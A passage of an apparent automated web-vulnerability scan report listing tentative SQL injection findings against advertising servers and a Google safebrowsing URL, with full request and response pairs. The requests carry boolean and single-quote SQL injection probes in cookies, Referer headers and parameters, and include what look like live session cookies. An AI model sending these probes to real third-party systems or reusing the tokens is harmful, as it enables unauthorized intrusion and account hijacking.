Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 151275073/1225019603/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript
... |
Request 2
GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&&&1%20and%201%3d2--%20=1 HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca
|
Response 2
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:21:05 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.16 NY-AD6
Set-cookie: C=oLK8X9wHI86Ycga6a4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 151275073/1225019603/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript
... |
1.17. http://q1.checkm8.com/adam/report [C cookie]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://q1.checkm8.com |
| Path: |
/adam/report |
Issue detail
The C cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the C cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t'%20and%201%3d1--%20
|
Response 1
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:24 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: A=dvV7X9w11Q9MvENT06Sba;Path=/;
Set-cookie: C=o7H9X9wRUHZUchaPa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:43 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143418691/1217163655/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
|
Request 2
GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t'%20and%201%3d2--%20
|
Response 2
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:24 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: C=o7H9X9wRUHZUchaPa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:43 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143418691/1217163655/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
|
1.18. http://q1.checkm8.com/adam/report [Referer HTTP header]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://q1.checkm8.com |
| Path: |
/adam/report |
Issue detail
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 80156717'%20or%201%3d1--%20 and 80156717'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=80156717'%20or%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t
|
Response 1
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:38 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.18 NY-AD8
Set-cookie: A=dvV7X9wiI18ZvENT06Sba;Path=/;
Set-cookie: C=omI9X9wB2HY7chadb4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:58 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 167371135/1241135538/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
|
Request 2
GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=80156717'%20or%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t
|
Response 2
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:39 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.18 NY-AD8
Set-cookie: C=omI9X9wB2HY7chaeb4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:58 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 167371135/1241135538/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
|
1.19. http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://safebrowsing-cache.google.com |
| Path: |
/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /safebrowsing'/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc HTTP/1.1
Host: safebrowsing-cache.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH
Pragma: no-cache
Cache-Control: no-cache
|
Response 1
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 11:41:22 GMT
Server: sffe
Content-Length: 11872
X-XSS-Protection: 1; mode=block
<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:
...[SNIP]...
|
Request 2
GET /safebrowsing''/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc HTTP/1.1
Host: safebrowsing-cache.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH
Pragma: no-cache
Cache-Control: no-cache
|
Response 2
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://www.google.com/sorry/?continue=http://safebrowsing-cache.google.com/safebrowsing%27%27/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc
Content-Length: 357
Date: Sat, 17 Sep 2011 11:41:28 GMT
Server: GFE/2.0
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/sorry/?con
...[SNIP]...
|
1.20. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ktextColor parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://showadsak.pubmatic.com |
| Path: |
/AdServer/AdServerServlet |
Issue detail
The ktextColor parameter appears to be vulnerable to SQL injection attacks. The payloads 21208523%20or%201%3d1--%20 and 21208523%20or%201%3d2--%20 were each submitted in the ktextColor parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=00000021208523%20or%201%3d1--%20&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A3%3A41&ranreq=0.31895528361201286&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71897565&rk1=2053665&rk2=1316239421.077&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; DPPIX_ON=YES
|
Response 1
HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:22:06 GMT
Content-Length: 1477
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:22:06 GMT; path=/
document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA/WgAAAAAAAAAAAAAAAAAAAAAAAAAAAABBgAAAGgMAANgCAABaAAAABwAAAAEAAAABAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=></div>');
document.writeln('<SCRIPT>');
document.writeln('document.write("<scr"+"ipt src=\'http://afe.specificclick.net?l=1966491151&sz=728x90&wr=j&t=j&u="+escape(document.location)+"&r="+escape(document.referrer)+"\'></scri"+"pt>");');
document.writeln('</SCRIPT>');
document.writeln('<NOSCRIPT>');
document.writeln('<A HREF="[default_href]"> <IMG SRC="[default_img_src]" WIDTH=728 HEIGHT=90 border=0 ALT="Click Here!"></IMG></A>');
document.writeln('</NOSCRIPT>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?operId=1&pubId=27330&siteId=27331&adId=23103&adServerId=794&kefact=0.500000&kpbmtpfact=0.000000&kadNetFrequecy=0&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1316222526&indirectAdId=32833&adServerOptimizerId=1&ranreq=0.31895528361201286&defaultReq=1&defaultedAdServerId=1053&kadDefNetFreq=0&imprCap=1&pageURL=http://ad.afy11.net/ad"> </iframe>'); |
Request 2
GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=00000021208523%20or%201%3d2--%20&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A3%3A41&ranreq=0.31895528361201286&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71897565&rk1=2053665&rk2=1316239421.077&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; DPPIX_ON=YES
|
Response 2
HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:22:07 GMT
Content-Length: 1828
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:22:06 GMT; path=/
Set-Cookie: _curtime=1316222527; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:32:07 GMT; path=/
document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAACAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=46AD5D33-3A03-4DF5-99B7-CA6C61AD8658&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D71897565%26rk1%3D2053665%26rk2%3D1316239421.077%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>\');<'+'/script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?operId=1&pubId=27330&siteId=27331&adId=23103&adServerId=243&kefact=0.500000&kpbmtpfact=0.741500&kadNetFrequecy=0&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1316222527&indirectAdId=0&adServerOptimizerId=2&ranreq=0.31895528361201286&defaultReq=1&defaultedAdServerId=1053&kadDefNetFreq=0&campaignId=1336&creativeId=0&pctr=0.000000&imprCap=1&pageURL=http://ad.afy11.net/ad"> </iframe>'); |
1.21. http://tag.contextweb.com/TagPublish/GetAd.aspx [Referer HTTP header]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://tag.contextweb.com |
| Path: |
/TagPublish/GetAd.aspx |
Issue detail
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193
|
Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
